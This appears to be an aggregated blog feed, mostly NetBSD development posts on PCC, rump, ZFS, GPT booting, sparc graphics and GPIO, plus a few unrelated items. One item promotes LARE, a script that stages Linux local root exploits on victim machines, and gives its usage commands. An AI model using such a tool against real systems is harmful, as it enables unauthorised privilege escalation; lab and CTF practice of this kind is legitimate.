After reading about progress with the Portable C Compiler (PCC) last year, I was inspired to try building it on NetBSD. Gregory McGarry had done some work integrating it into the toolchain though it is not yet useable to build a full release, but the native build framework in external/bsd/pcc was incomplete.

I updated this a while ago so that it is possible to build a distribution or release containing pcc(1), pcpp(1) and ccom(1) binaries for the target architecture by setting the following two variables in your /etc/mk.conf or passing them to build.sh on the commandline

    MKPCC=yes
    MKPCCCMDS=yes

There had been many bug fixes and features added since previous import in September 2009, but the major addition was that GCC compatibility is now enabled by default, and many commonly used attributes and builtin functions are now supported. I had heard of people trying to use pcc to build a kernel without success and went for an alternative approach, building userland programs, as my feeling was that testing smaller code units would be a lot easier. I wrote a script (src/external/bsd/pcc/prepare-import.sh) to configure the PCC sources for import to NetBSD in a consistent manner, and have been using it to follow development for a few months, reporting problems along the way where I could.

The latest pcc can build all of bin/ and sbin/, most of games/ (except for dab(6) which is C++), and only a few issues remain in usr.bin/ and usr.sbin/. There are still issues outstanding with PIC support on i386 at least, which prevents building shared libraries within the NetBSD framework at this time, though this can be worked around by setting MKPIC=no.

The in-tree version has been updated and is now at "pcc 0.9.9 [20100603]" which I've been using successfully on i386 though there is support included for amd64, arm, hppa, mips, powerpc, sparc64 & vax CPUs which may also work.

All the credit and many thanks go to Anders Magnusson who has been working on pcc for many years, he is very responsive to problem reports, sometimes with fixes posted the same day.


          Kernel Modules Autoload from Host in Rump   

Since early 2009 NetBSD and rump has supported execution of stock kernel module binaries in userspace on x86 architectures. Starting in -current as of today, kernel modules will automatically be loaded from the host into the rump kernel. For example, when mounting a file system in a rump kernel, support will be automatically loaded before mounting is attempted.

The first issue with autoloading host kernel modules in rump was kernel symbol renaming: to prevent collisions between the application and kernel C symbols, the rump build uses objcopy to prefix symbols with the string rumpns. While running objcopy on a prebuilt kernel module was possible without access to the module's source code, it was a manual step necessary to get a standard kernel module loaded. This was solved by adding a hook to the module loader to adjust the module's string table after it is loaded but before it is linked.

The second issue was that kernel modules had to be loaded manually by calling rump_sys_modctl(); in contrast kernel modules are commonly autoloaded when necessary. While the standard kernel routines included in a rump kernel would attempt to autoload the module, they would fail because the module files were not available within the rump file system namespace. With some improvements to the rump host file system, etfs, it is now possible to map the kernel module directory (e.g. /stand/i386/5.99.27/modules) inside the rump kernel.

Autoloading kernel modules from the host demonstrates a key feature and difference of rump-style lightweight service virtualization: only one full host installation is necessary (although the coexistence of multiple different rump kernel versions is of course possible). This should be contrasted with traditional heavyweight approaches to building virtual services, where each virtual service requires an entire OS installation and maintenance.


          Summer of code results: NetBSD zfs port   

Overview

This summer I worked on a port of ZFS file system to NetBSD and was mentored by Andrew Doran. This entry details the results of my Summer of Code project and future plans.

Goals

During this year summer of code I have worked on a port of a ZFS file system to the NetBSD. Before midterm we wanted to have loadable zfs and solaris modules with eventually working zvol. After midterm we wanted to look at zfs file system itself and try to port solaris VFS and vnode operations to NetBSD. Porting zfs snapshots and zal (zfs acl management) was set as a optional taks.

Results

I was able to succesfuly complete all set midterm and end term tasks. After GSOC we was able to succesfuly mount and compile new kernel on a zfs file system. Our work was merged to the NetBSD base system to the HEAD branch befpre the end of GSOC. It is build by default for amd64 and i386 architectures however only i386 is functional now. There are still problems with integration and zfs can deadlock during vnode reclaim, fsync very easily.

I'm willing to continue in my work after the import. More details about usage of zfs under the NetBSD can be found at ZFS TODO. There are many open issues with zfs still.

  • Fix amd64 panic during zvol creation
  • Fix vnode lifecycle related deadlocks in zfs
  • Fix problems with file permissions on a zfs filesystem
  • Add native getpages and putpages routines for zfs
  • Port zfs snopshots layer
  • Update zfs code to newer version
  • Add support for exporting zfs volumes as iSCSi target

          Summer of Code results: GPT-aware boot loader support   

Overview

I mentored NetBSD developer Mike Volokhov for this year's successful Google Summer of Code project titled "GPT-aware boot loader support."

Goals and Results

GPT is an acronym for GUID Partition Table (and GUID is an acronym for Globally-Unique IDentifier). This type of partition table was introduced as part of the Extensible Firmware Interface (EFI) standard proposed by Intel and originally found on Intel's IA64- (Itanium-)based systems. Many x86-based operating systems now create and manage disks using GPTs since they are much more robust and flexible than the traditional PC's Master Boot Record (MBR) method.

Most PCs, however, still use a traditional BIOS (not EFI) to boot, so while you can use a GPT to partition a disk, it's tricky to boot from it. That's where this project comes in. His project's primary goals were to develop and show a system for booting from a GPT-partitioned disk on a system with a traditional PC BIOS. He did this by developing a new boot block that's aware of the GPT, adapting the FAT-based boot loader for use in an EFI system partition, and enhancing the second-stage loader to load the kernel and modules from a GUID partition.

The work isn't yet integrated, but Mike is planning on developing it further and bringing it into the system. When it's fully integrated, i386 and amd64 systems will be able to use either traditional MBR- or GPT-formatted disks as boot disks. Please visit his web page at http://www.NetBSD.org/~mishka/gptboot/ for more details, code, caveats, and instructions for trying it out! Feedback and improvements are welcome!


          The state of accelerated graphics on NetBSD/sparc   

Now that NetBSD/sparc switched to wscons in -current it can finally run the Xorg Xserver out of the box. This means we will support accelerated graphics in X and the kernel console on a lot more hardware than before with Xsun and friends, namely:

  • Sun CG3 - has kernel support and works in X with the wsfb driver, the hardware doesn't support a hardware cursor or any kind of acceleration so we won't bother with a dedicated X driver. The hardware supports 8 bit colour only.
  • Sun CG6 family, including GX, TGX, XGX and their plus variants - supported with acceleration in both the kernel and X with the suncg6 driver. Hardware cursor is supported, the hardware supports 8 bit colour only.
  • Sun ZX/Leo - has accelerated kernel support but no X yet. The sunleo driver from Xorg should work without changes but doesn't support any kind of acceleration yet. The console runs in 8 bit, X will support 24 bit.
  • Sun BW2 - has kernel support, should work with the wsfb driver in X. This is untested, the board doesn't support a hardware cursor or any kind of acceleration. Hardware is monochrome only.
  • Weitek P9100 - found in Tadpole SPARCbook 3 series laptops, supported with acceleration in both the kernel and X with the pnozz driver. Hardware cursor is supported. The console runs in 8 bit, X can run in 8, 16 or 24 bit colour.
  • Sun S24/TCX - supported with acceleration in both the kernel and X with the suntcx driver. A hardware cursor is supported, support for 8bit only boards is untested for lack of hardware. The console runs in 8 bit, X in 24 bit.
  • Sun CG14 - supported without acceleration in both the kernel and X for total lack of documentation for the SX rendering engine. We do support a hardware cursor with the wsfb driver though. The console runs in 8 bit, X in 24 bit.
  • Fujitsu AG-10e - supported with acceleration in both the kernel and X, a hardware cursor is supported. The console runs in 8 bit, X in 24 bit.
  • IGS 1682 found in JavaStation 10 / Krups - supported, but the chip lacks any acceleration features. It does support a hardware cursor though which the wsfb driver can use. Currently X is limited to 8 bit colour alhough the hardware supports up to 24bit.

All boards with dedicated drivers will work as primary or secondary heads in X, boards which use wsfb will only work in X when they are the system console. For example, you can run an SS20 with a cg14 as console, an AG-10e and two CG6 with four heads.

There is also a generic kernel driver ( genfb at sbus ) which may or may not work with graphics hardware not listed here, depending on the board's firmware. If it provides standard properties for width, height, colour depth, stride and framebuffer address it should work but not all boards do this. For example, the ZX doesn't give a framebuffer address and there is no reason to assume it's the only one. Also, there is no standard way to program palette registers via firmware so even if genfb works colours are likely off. X should work with the wsfb driver, it will likely look a bit odd though.

Boards like the CG8 and CG12 have older, pre-wscons kernel support and weren't converted due to lack of hardware. They seem to be pretty rare though, in all the years I've been using NetBSD/sparc I have not seen a single user ask about them.

Finally, 3rd party boards not mentioned here are unsupported for lack of hardware in the right hands.
Graphics hardware supported by NetBSD/sparc64 which isn't listed here should work the same way when running a 32bit userland but this is mostly untested.


          Google Summer of Code: Miniaturise NetBSD   

NetBSD has a reputation for being somewhat minimalist, and it is widely used in embedded systems. The high level concepts behind miniaturising an operating system are quite straight forward and well understood. You throw away all the features you don't want and then you compress the remainder as much as possible. Simple, right?

It's such a simple idea that every embedded system developer builds their own system for doing this. This project aims to provide NetBSD with an integrated system for constructing embedded systems so that system developers can get on with the job of implementing their application specific features. Of course, building a system that caters for all developers and not just one isn't quite as simple as it might be.

This system lets the developer select and deselect NetBSD features by specifying which syspkgs they (don't) want on their system image. In addition, individual files and directories can be trimmed from the image for cases where syspkgs packages are too coarse.

3rd party software can be automatically built and installed into the image if the developer constructs BSD makefiles for them in the same way that NetBSD builds 3rd party source in its own tree. Developers can of course just add a collection of files they already have if they want something simple.

Images formats that will be created are normal disk images (e.g. for CompactFlash cards), ISOs, gzipped tar files and kernels with a built in memory disk as root.


          GPIO Revisited   

NetBSD has had support for General Purpose Input/Output devices since the 4.0 release, when the GPIO framework from OpenBSD 3.6 was imported. GPIO devices, or gpios for short, provide an easy way to interface electronic circuits which can be as simple as a LED or that provide more complex functionality like a 1-Wire or I2C bus.

Since the import of the GPIO framework into NetBSD, I have reworked larger parts of that subsystem in OpenBSD to address some problems and drawbacks. I have now imported these changes into NetBSD and continued to improve on them. The new GPIO framework retains backwards compatibility while adding new features: It integrates with the kauth(9) security framework, has it's own config file format gpio.conf(5), and integrates with the system startup scripts in /etc/rc.d.

gpios are either wired internally for a specific function or connected to a header on the system board where electronic devices can be connected. And on many embedded systems LEDs are found that are controlled by gpios, providing a simple user feedback mechanism.

NetBSD's GPIO subsystem is used to control individual pins of gpios, but also a device driver can make use of GPIO pins using the gpio framework. In this case a driver maps the pins it needs and they are no longer available to other uses.

Development goals and motivation

The gpio model found in NetBSD 4.0 is weak in a few regards:

A device driver that needs gpio pins must be configured in a kernel configuration file and a custom kernel needs to be built. Such device drivers therefore can not be attached to gpio(4) devices at runtime.

Since only the user of a machine can know the exact layout of its gpio pins there is always the risk of damaging hardware. The use of gpios can be dangerous and making them generally available can be a risk.

So the goal was to lock down gpio configuration to an appropriate security mechanism and to make it possible to attach device drivers to gpio pins at runtime. As a convenience to users, individual pins could be named for later reference. Backwards compatibility had to be retained, since the older API has made it into a release.

Securing GPIO

Traditionally UNIX systems had the notion of a securelevel, and in this model all configuration of gpios is done at an early boot stage at securelevel 0 and once the securelevel is raised, it can not be changed. Pins that have been configured at securelevel 0 remain accessible at higher securelevels. NetBSD, however, does no longer directly support the securelevel model, but rather uses kauth(9) as a security mechanism (or, rather hides the securelevel behind kauth(9)). You can still set the securelevel using the kern.securelevel sysctl or by setting securelevel=N in /etc/rc.conf. I you use the securelevel feature by setting it to a value higher than zero, your gpio layout and configuration can no longer be changed once the /etc/rc.d/securlevel script has been run.

A New Syntax for gpioctl(8)

The changes to the kernel parts of course had to be reflected in the gpioctl(8) userland command, which got an all new and easier commandline syntax at the same time.

A device driver that uses gpio pins can now be attached using the following command:

gpioctl gpio0 attach gpioow 4 1

In this example we attach a gpioow(4) device on pin 4 of the /dev/gpio0 device with a mask of 1 (the mask specifies how many and which pins are being used by the driver starting at a offset, which is the pin number.)

If the device had to be detached again, it could be done while still at securelevel 0 using the command

gpioctl gpio0 detach gpioow0

Notice how in the first example, only the driver name is given, but in the second example, the name of the driver instance is specified.

Individual pins can now be configured using a relatively easy syntax and at the same name given a symbolic name. Once a pin has been named, it can be referenced either by pin number or symbolic name.

gpioctl gpio0  set [in|out|inout|od|pp|tri|pu|pd|iin|iout] []

One a pin has been configure this way, it will be accessible in the usual way even when the securelevel has been raised.

While still at securelevel 0, a pin can be unconfigured using the unset command as follows:

gpioctl gpio0  unset

Access to gpio pins is done as follows:

gpioctl gpio0  [0|1|2]

The /etc/gpio.conf configuration file format

To ease the configuration of GPIO pins during system startup I introduced the /etc/gpio.conf configuration file, which is being read by the /etc/rc.d/gpio script if the gpio variable in /etc/rc.conf is set to YES. The configuration file contains of one more lines that follow the gpioctl(8) command line syntax, but without the gpioctl command name. Lines starting with a '#' and empty lines are ignored. In the following examples, we define an input pin, and error led and attach a 1-Wire bus at one pin of gpio0:

# Sample gpio configuration

gpio0 1 set in key
gpio0 3 set out error_led
gpio0 attach gpioow 8 1

Three steps to secure GPIO usage

  1. Edit the /etc/gpio.conf configuration file and carefully define your GPIO layout
  2. Set the gpio variable in /etc/rc.conf to YES
  3. Set the securelevel variable in /etc/rc.conf to 1

These steps will let you use the configured GPIO pins at runtime, but the layout can not be changed, not even by the root user.


          Google Summer of Code zfs-port project status update 2   

ZFS as whole has 2 main ways it can be accessed. The first is ZVOL and the second is ZPL. In my first status update I said that I had ported ZVOL layer to NetBSD, and I was able to create and use ZFS Zpools and Zvols (Logical partitions exported from one disk storage pool called zpool).

Over the last few weeks I have worked on a ZPL port. ZPL is ZFS file system layer. I have ported zfs_vfsops.c file and zfs_vnops.c file to NetBSD. Today I have ZFS to state where I can mount ZFS data set, copy whole kernel source tree there and finally build NetBSD kernel on it.

$ su 
# modload /mod/solaris.kmod                                                                                                                       
# modload /mod/zfs.kmod                                                                                                                           
# zfs mount test/zfs
 # mount 
/dev/wd0a on / type ffs (local)
kernfs on /kern type kernfs (local)
ptyfs on /dev/pts type ptyfs (local)
/dev/zvol/dsk/test/zfs on /test/zfs type zfs (local)
# zfs list 
NAME        USED  AVAIL  REFER  MOUNTPOINT
test        391M  1.57G    18K  /test
test/tank    40M  1.61G    16K  -
test/zfs    351M  1.57G   351M  /test/zfs
test/zfs1    18K  1.57G    18K  /test/zfs1
# cd /test/zfs/src/sys/arch/i386/compile/GENERIC/
# make           
making sure the compat library is up to date...
`libcompat.a' is up to date.
making sure the kern library is up to date...
`libkern.o' is up to date.
#   compile  GENERIC/init_main.o
cc -ffreestanding -fno-zero-initialized-in-bss -O2 -std=gnu99 -fno-strict-aliasing -Werror -Wall -Wno-main -Wno-format-zero-length -Wpointer-arith -Wmissing-prototypes -Wstrict-prototypes -Wswitch -Wshadow -Wcast-qual -Wwrite-strings -Wno-unreachable-code -Wno-sign-compare -Wno-pointer-sign -Wno-attributes -Wextra -Wno-unused-parameter -Werror -Di386 -I. -I../../../../../common/include -I../../../../arch -I../../../.. -nostdinc -DMAXUSERS=64 -D_KERNEL -D_KERNEL_OPT -I../../../../lib/libkern/../../../common/lib/libc/quad -I../../../../lib/libkern/../../../common/lib/libc/string -I../../../../lib/libkern/../../../common/lib/libc/arch/i386/string -I../../../../dist/ipf -I../../../../external/isc/atheros_hal/dist -I../../../../external/isc/atheros_hal/ic -I../../../../../common/include -c ../../../../kern/init_main.c
#    create  vers.c
sh ../../../../conf/newvers.sh 
#   compile  GENERIC/vers.o
cc  -ffreestanding -fno-zero-initialized-in-bss  -O2 -std=gnu99 -fno-strict-aliasing   -Werror -Wall -Wno-main -Wno-format-zero-length -Wpointer-arith -Wmissing-prototypes -Wstrict-prototypes -Wswitch -Wshadow -Wcast-qual -Wwrite-strings -Wno-unreachable-code -Wno-sign-compare -Wno-pointer-sign -Wno-attributes -Wextra -Wno-unused-parameter  -Werror   -Di386 -I.  -I../../../../../common/include -I../../../../arch  -I../../../.. -nostdinc  -DMAXUSERS=64 -D_KERNEL -D_KERNEL_OPT -I../../../../lib/libkern/../../../common/lib/libc/quad -I../../../../lib/libkern/../../../common/lib/libc/string -I../../../../lib/libkern/../../../common/lib/libc/arch/i386/string   -I../../../../dist/ipf -I../../../../external/isc/atheros_hal/dist -I../../../../external/isc/atheros_hal/ic -I../../../../../common/include  -c vers.c
#      link  GENERIC/netbsd
ld -Map netbsd.map --cref -T ../../../../arch/i386/conf/kern.ldscript -Ttext c0100000 -e start -X -o netbsd ${SYSTEM_OBJ} ${EXTRA_OBJ} vers.o
NetBSD 5.99.14 (GENERIC) #1: Tue Jun 30 20:00:37 UTC 2009
   text    data     bss     dec     hex filename
8554455  407284  538396 9500135  90f5e7 netbsd

I tried to boot build kernel and it worked like a charm. There is still much work to do port ZFS snapshot support, properly implement security policies for ZFS access, test ZFS ACL support etc.

My work is accessible in my git repository at git://rachael.ziaspace.com/src.git in a branch called haad-zfs. You can easily clone this repo with command git clone git://rachael.ziaspace.com/src.git. To get haad-zfs branch checkout you need to use command git checkout -b haad-zfs origin/haad-zfs from src directory.


          Stay safe: how to install the patch for Linux bug CVE-2016-0728   

A security bug affecting Linux versions 3.8 and higher was recently identified. Although this bug (CVE-2016-0728) was first introduced into the Linux Kernel in 2012, it was only discovered and made public a few days ago. When we learned of the bug’s existence, we immediately patched all internal LeaseWeb servers. We advise everyone to patch their […]

The post Stay safe: how to install the patch for Linux bug CVE-2016-0728 appeared first on LeaseWeb Blog.


          New Post: IPresenterFactory is flawed   
Hi tsahiasher,

Thanks for checking out my project. And thanks for your feedback.


Whilst I do not agree that the design of the usage of IPresenterFactory is flawed, I do agree that the PresenterFactories for Ninject and StructureMap should probably have been written without a requirement that the IView parameter to the Presenter’s constructor be named "view" .

If you look at the UnityPresenterFactory, there is no such requirement and you can name the IView parameter anything you like.

I disagree that the IPresenterFactory is doing the job of the DI Container. Firstly, we should be referring to an Inversion of Control container (IOC), rather than DI container. The control of resolving the dependency is delegated to the IOC. The factory is handling the injection of the dependency. If you look at this post by Mark Seemann http://blog.ploeh.dk/2014/05/19/di-friendly-framework/ , you will see that it is not poor practice to use an IOC inside a factory which has the responsibility of returning to the framework the instantiated object. If you look at the class "WindsorCompositionRoot" in that article, you will see the example I am referring to (in that case, it is pertinent to the ASP.NET MVC framework).

Going back to the Ninject example, you could probably rewrite the Create method as follows:
        public virtual IPresenter Create(Type presenterType, Type viewType, IView viewInstance)
        {
            if (presenterType == null)
                throw new ArgumentNullException("presenterType");
            if (viewType == null)
                throw new ArgumentNullException("viewType");
            if (viewInstance == null)
                throw new ArgumentNullException("viewInstance");

            Kernel.Bind<IView>().ToConstant(viewInstance).InTransientScope();
            Kernel.Bind<IPresenter>().To(presenterType).InTransientScope();

            var presenter = Kernel.Get<IPresenter>();
            
            Kernel.Unbind<IPresenter>();
            Kernel.Unbind<IView>();

            return presenter;
        }
As you can see, there is now no reliance on the IView being named "view". I haven’t thoroughly tested that, but it passes the units tests.

I’ll make a quick comment on some other DI issues.
When you create your bindings for all of your services, you should not do that in the IPresenter factory. That IPresenter factory’s responsibility is solely to instantiate the relevant Presenter for the relevant IView. Your other services, which deliver data and process business rules, should be bound in a separate place.

So, if we take a simple example, the Program class’s Main method might look something like this:
 [STAThread]
 static void Main()
 {
     Application.EnableVisualStyles();
     Application.SetCompatibleTextRenderingDefault(false);

     IKernel kernel = new KernelFactory().CreateKernel();// in here, bind all your services/dependancies etc.       
     PresenterBinder.Factory = new NinjectPresenterFactory(kernel); 

     var mainForm = new MainForm();
     Application.Run(mainForm);
 }
The last, and probably most important, thing to note is that you will need to manage how and when your IOC disposes of objects. Resolving objects with an IOC is easy. But making decisions on their lifetime can get tricky. Especially in a stateful environment like Winforms. It is easier with web to scope things to the lifetime of an HttpRequest. But with desktop development, you need to be careful not to create memory leaks.
So, a tool to profile your memory is a good idea, if you can get access to one. I know Redgate's memory profiler has a 30 day trial, so it would be a good idea to make sure your Services and other dependencies are being disposed of when you expect them to.

All the best.

          LARE - [L]ocal [A]uto [R]oot [E]xploiter is a Bash Script That Helps You Deploy Local Root Exploits   
[L]ocal [A]uto [R]oot [E]xploiter is a simple bash script that helps you deploy local root exploits from your attacking machine when your victim machine do not have internet connectivity.
The script is useful in a scenario where your victim machine do not have an internet connection (eg.) while you pivot into internal networks or playing CTFs which uses VPN to connect to there closed labs (eg.) hackthebox.gr or even in OSCP labs. The script uses Local root exploits for Linux Kernel 2.6-4.8
This script is inspired by Nilotpal Biswas's Auto Root Exploit Tool

Usage:


1- Attacking Victimin Closed Network
You have to first set the exploit arsenal on the attacking machine and start the apache2 instatnce using the following command. bash LARE.sh -a or ./LARE.sh -a


Once done with it, You have to copy the script to the victim machine via any means (wget, ftp, curl etc). and run the Exploiter locally with the following command: bash LARE.sh -l [Attackers-IP] or ./LARE.sh -l [Attackers-IP]



2- Attacking Victim with Internet Acess
In this scenario the script is to be ran on the victims machine and it will get the exploits from the exploit-db's github repository and use it for exploitation directly. This is the original fuctionality of Auto Root Exploit Tool with some fine tunning done. Run the Exploiter with the following command: bash LARE.sh -l or ./LARE.sh -l


Note
The script runs multiple kernal exploits on the machine which can result in unstability of the system, it is highly recommended to uses it as the last resort and in a non-production environment.


Download LARE

          RE: So far I am not impressed   
I strongly agree with you about Qt4.5, but neve underestimate a developer pride.. Even if WidgetOnCanvas were 100 times better then Clutter I think they would prefer continue developing Clutter.. But I don't agree that Moblin is unimpressive. They are working hard on great things like (amazing) boot speed, and I think it's because Moblin that intel is investing so much in Xserver, with things like kernel-mode-setting, GEM, DRI2 and so on. I recommend this video:
          USB3 HDD does not power down with system :: Kernel & Hardware   

-- Delivered by Feed43 service


          Kernel Panic when Booting with Android USB Tethering :: Kernel & Hardware   

-- Delivered by Feed43 service


          head_64.o: warning :: Kernel & Hardware   

-- Delivered by Feed43 service


          udev conflicting device mode :: Kernel & Hardware   

-- Delivered by Feed43 service


          Cavaness' single leads Cedar Rapids to 6-2 win over Clinton   
CLINTON, Iowa (AP) -- Christian Cavaness hit a two-run single in the seventh inning, leading the Cedar Rapids Kernels to a 6-2 win over the Clinton LumberKings on Friday.
          Desarrollador web para trabajar en plataforma django, proyecto denominado Promotickets basado en una estructura de datos (arbol)   
Nuestra compañia EventsLike desea desarrollar una plataforma denominada Promoticket, que tiene como objeto la venta de tickets para conciertos o eventos determinados,  se usara estrategias de mercadeo de redes; cada espectador que logre vender tickets generara puntos promocionales como incentivo.

Requisitos funcionales:

- Apertura de la estructura de datos, del arbol binario
- Registro de nuevo usuario (registro de NODO)
- Operación insición binaria
- Acumulación de puntos en toda la red, si y solo si , se efectua un nuevo registro (nuevo NODO)
- Pantalla de estados de saldo de puntos PaqueteTickets y saldo de puntos RedPromo
- Transferencias de puntos (ya sea de PaqueteTickets o RedPromo)
- Consultas y busquedas de usuario dentro del arbol binario
- Visualización del arbol binario (n niveles)
- Consultar hístorico de transacciones de saldo

Persona que se requiere debe cumplir con los siguientes requisitos:

* Se necesita un desarrollador con amplios conocimientos en django, ultima versión.
* Extensión que se utilizara django-treebeard (adecuaremos al proyecto, en algunos casos se necesitara personalización de dicha extensión)
* Se trabajara con base de datos postgresql.
* De preferencia opcional que trabaje bajo sistema operativo basado en kernel linux,
* Se tiene un documento de especificaciones de requisitos, abierto a cambios de mejora, proyecto totalmente nuevo.
* Conocimientos en git (importante para versionamiento de código y trabajos en equipo)
* Estara a mando de un responsable del proyecto, comunicacion sera fluida.


Categoría: IT & Programación
Subcategoría: Programación Web
¿Cuál es el alcance del proyecto?: Crear un nuevo sitio personalizado
Es un proyecto o una posición?: Un proyecto
Actualmente tengo: Tengo las especificaciones
Experiencia en este tipo de proyectos: Si (He administrado este tipo de proyectos anteriormente)
Disponibilidad requerida: Tiempo completo
Roles necesarios: Desarrollador
          Data Center/Server Engineer - Intel - San Jose, CA   
The engineer will be responsible for handling all aspects of OS, Data Center software, Kernel, and middleware....
From Intel - Sat, 17 Jun 2017 10:23:09 GMT - View all San Jose, CA jobs
          Linux es una religión!   
Algunos linuxeros fanáticos le dan tanta importancia a Linux que parece que darían su vida tal cual talibán suicida, bueno, ellos se ganan un montón de vírgenes en el cielo, pero los linuxeros nada, aquí hay mas razones por las que Linux es una religión:
  • Tiene sus dogmas: Solo usarás Software libre!
  • Tiene sus ídolos: Stallman y Torlvads
  • Tiene sus símbolos sagrados: Tux
  • Libro sagrado: El kernel
  • Rituales: compilación de kernel
  • Demonio: Windows/Gates
  • Tratarán de convencerte de que te conviertas y nunca pararán hasta lograrlo o hasta que les muestres tu escopeta
  • Las discusiones del tema nunca terminan, por lo menos nunca lo harán de buena forma.
  • Asisten a misas: Installfests, FLISOL
  • Tienen sus pecados: usar Wine y software privativo
  • "El Counter Strike no es excusa para virtualizar Windows"
  • Hay tantas ramas.
  • Ubuntu: La dominante, sus usuarios no son ni muy fanáticos ni muy extremistas (como los católicos)
  • gNewSense: Fundamentalistas, usan SOLO software libre(como los que toman la Bliblia de forma literal)
  • Slackware: La que se niega a cambiar en ningún aspecto.
  • Debian: La secta llena de locos extremistas que agreden a los que no piensan como ellos (como los musulmanes)
  • Promesa: Linux no tiene fallos y liberará tu PC de los virus y la guiará por el camino correcto.
  • "Linux es el único camino verdadero, los de Mac son fanáticos ciegos de Steve Jobs y tienen la mente cerrada por la blancura hipnotizante de las Macs.
  • Discusiones internas sobre "Gnome o KDE"
  • El falso profeta: GNU/Hurd
  • "Mono es un recurso del maligno para apoderarse de tu alma"

          Geekly News   
Es sábado, la semana se acabó, pero dejo buena cantidad de noticias interesantes para nosotros los geeks. Aquí un resumen de lo mas interesante que aconteció a través de la blogosfera.

Microsoft libera código para Linux
Y después se descubre porqué
YouTube experimenta con 3D
TwittAround presentado
Habrá beta privada de Google Wave en septiembre
WiTricity podría estar listo en 18 meses
La pagina principal de Twitter se rediseñará
Miro lanza su versión 2.5

Trataré de que cada sábado halla nueva edición de Geekly News para que no se pierdan de las noticias mas importantes cada semana.


          Microsoft nunca cambiará   

En el titulo quizás me equivoque, pero lo que Microsoft ha demostrado recientemente lo confirma, y es que Microsoft parece nunca aprender o no tener la mas mínima intención de mejorar. Se acaba de descubrir que violan la licencia GPL. Justo cuando parecía que Microsoft cambiaba y daba un paso hacia el software libre liberando código para el kernel Linux bajo licencia GPL, nos salen con que violaban las licencias estas del código abierto.

Aquí hago punto y aparte, pues no se trata de algo que solamente enoje a los linuxeros porque Microsoft no apoya el software libre, porque lo privativo es malo, etc. Se trata de una violación de licencia, hecha por una enorme corporación y que seguramente se librará impune.

La violación viene de unos drivers que incluían código GPL y binario privativo, combinados, cosa prohibida en la licencia GPL. Microsoft luego liberó el código privativo en cuestión, pero anunciándolo como si fuera algo bueno, cuando en realidad parchaba el error que estaban cometiendo.

Solo algo mas que decir: Típico de Microsoft

Mas información: Microsoft libera código para Linux en MuyComputer
Microsoft violó la GPL en MuyLinux

Artículos relacionados:
¿Como seria la distro Linux de Microsoft?
Microsoft, alejate de mi Firefox!
Si todo fuera hecho por Microsoft


          Ya está disponible la primera versión alpha para los sabores de Ubuntu 17.10   

Lubuntu Next Desktop

Tal y como nos informan desde SoftPedia, Canonical ha anunciado que ya están disponibles para su descarga e instalación las imágenes de la versión Alpha 1 de Ubuntu 17.10 Artful Aardvark, si bien se trata de los sabores de Ubuntu que sí quieren participar en esta etapa del desarrollo de la distro.

Durante todo su ciclo de desarrollo, y siguiendo con su propia tradición, aparecerán en total dos alphas y dos betas. La Alpha 1 es el primer lanzamiento de versiones en desarrollo, con lo que las imágenes en su mayoría están basadas en su mayoría en la última versión estable del sistema operativo.

Lo que esto significa es que el kernel y los gráficos que encontraremos son los de Ubuntu 17.04. O lo que es lo mismo: kernel 4.10, X.Org 1.19.3 y Mesa 17.1.2. Systemd, sin embargo, ha sido actualizado a su última versión, en concreto systemd 233. Recordamos que systemd sustituye a init.d como demonio para iniciar servicios. Entre los sabores que participan en esta Alpha 1 encontramos a Kubuntu 17.10, Lubuntu 17.10 y Ubuntu Kylin 17.10, cada una de ellas con su propio set de mejoras.

La Alpha 2 será la siguiente en llegar y lo hará el próximo 27 de julio (aunque también para los sabores de Ubuntu). Para los que quieran comprobar los avances que Ubuntu va realizando en la elaboración de su siguiente lanzamiento, tendrán que recurrir a las daily builds para ver qué es lo que va cambiando.

Ubuntu no liberará las alpha ni en la primera beta. La única versión de desarrollo que saldrá con el nombre de la distro principal será la Beta 2 (también conocida como Final Beta). Está previsto que esta segunda beta se libere el 28 de septiembre de este mismo año.

La primera beta se espera para el 31 de agosto, con la versión estable llegando a todos los usuarios el próximo 19 de octubre. Recordamos que Ubuntu 17.10 incluirá GNOME 3.26 como escritorio por defecto, después de que Canonical decidiese abandonar Unity y la convergencia.

Vía | SoftPedia
En Genbeta | Vida después de la convergencia: ¿qué le espera a Ubuntu tras abandonar Mir y Unity 8?


          Security update for the Linux kernel 1077   
SUSE Linux Enterprise Server Increase availability, efficiency, & innovation Virtual Machine Driver Pack Paravirtualized disk, network, & balloon drivers SUSE Linux Enterprise Desktop Office tools that work with Windows, Mac & UNIX SUSE Linux Enterprise Workstation Extension Use your enterprise server as a workstation SUSE Embedded For stable and secure Continue Reading
          Important CentOS 7 Linux Kernel Security Update Patches Five Vulnerabilities   

CentOS maintainer Johnny Hughes recently published a new security advisory for user of the CentOS 7 operating system series to inform them about an important kernel security update.

Read more


          Avast! Anti Virus Support for 64-bit Windows   
It comes as quite a relief that the Avast! anti virus support now fully renders help to 64-bit Windows platform. This has been enabled in the Avast! Home and Professional versions. This has been seen as a big stride by ALWIL Software as it had been closely watching the proceedings and following up on the whole issue of taking up this platform by Avast!. The Windows XP 64-bit version has an extensive range of supporting up to 32 GB of RAM and 16 TB of virtual memory. A lot of antivirus support software cannot usually support the 64-bit Windows because of its massive storage. The Windows 64-bit version can run applications at great speed when engaged to work with big data sets.
These applications have the propensity to preload a lot more data into the virtual memory enabling quicker access by the 64-bit extensions of the processor. This minimizes the time taken to insert data into virtual memory and also in writing data storage devices. In this way, applications can run a lot quicker with greater control.
Regular antivirus support applications in 32-bit versions of Windows do not run on the 64-bit Windows. This is because the 32-bit versions depend on the 32-bit kernel drivers. However, the Avast! anti virus support application changes this equation by running traditional 64-bit drivers and still deliver the best mode of protection and safety as achieved in the 32-bit Windows. Both the 32-bit and the 64-bit versions get installed in the same way.
          Cisco Linksys AE3000 WiFi USB Dongle and Linux Driver Installation   
So, back again with yet another geek niggle! This time its to do with drivers. 

[ Bored of the  crap that i  have written, jump to the bottom directly, to install the driver :). ]

I was wanting to experiment something with setting up a web server and was very excited to get to work right away! There goes, formatted my personal computer, and installed Ubuntu 12.04 Precise Pangolin. I have a 8GB RAM, good enough eh!, won't compromise with the 32 bit edition, so went for the 64 bit edition. Downloaded the live cd, installed, and was all thrilled to my desktop. Of course i installed it using wired ethernet that ran across my house much to the cribbing's from my wife. I installed ubuntu-desktop as well, for some reason known only to me, and unplugged my wired cable, plugged in my shinny new Cisco AE3000 just to find out that neither ndiswrapper nor compiling driver from the chip-set vendor would work. Mere frustration, without Internet. 

